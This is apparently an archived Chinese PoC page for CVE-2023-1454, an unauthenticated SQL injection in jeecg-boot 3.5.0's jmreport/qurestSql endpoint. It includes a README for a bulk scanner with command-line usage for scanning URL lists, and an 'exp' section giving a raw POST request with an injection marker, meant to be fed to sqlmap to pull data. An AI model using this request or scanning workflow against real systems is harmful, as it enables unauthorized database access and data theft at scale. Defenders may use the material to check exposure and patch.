关联漏洞
标题:
jeecg SQL注入漏洞
(CVE-2023-1454)
描述:jeecg是一个应用软件。一款基于代码生成器的智能开发平台。 jeecg-boot 3.5.0版本存在SQL注入漏洞,该漏洞源于文件 jmreport/qurestSql 存在安全问题, 通过参数 apiSelectId 导致SQL注入。
描述
CVE-2023-1454,Jeecg-Boot 前台SQL注入,CVE-2023-1454批量检测
介绍
# CVE-2023-1454
jmreport/qurestSql 未授权SQL注入批量扫描poc
Jeecg-Boot是一款基于Spring Boot和Jeecg-Boot-Plus的快速开发平台,最新的jeecg-boot 3.5.0 中被爆出多个SQL注入漏洞。
# 说明
[原工具地址](https://github.com/MzzdToT/CVE-2023-1454/)
原工具误报率高,修改了一下判断条件顺便优化了代码。
## 工具利用
python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 单个url测试
python3 CVE-2023-1454-scan.py -f url.txt 批量检测
扫描结束后会在当前目录生成存在漏洞url的vuln.txt
poc:

exp:
将数据包保存为txt用sqlmap可得到数据
```
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129
{"apiSelectId":"1290104038414721025",
"id":"1*"}
```

## 免责声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
文件快照
[4.0K] /data/pocs/2291cd6b0fce5277e0426713f67842d3efe456f2
├── [3.4K] CVE-2023-1454.py
├── [1.2K] README.md
└── [100K] run.png
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。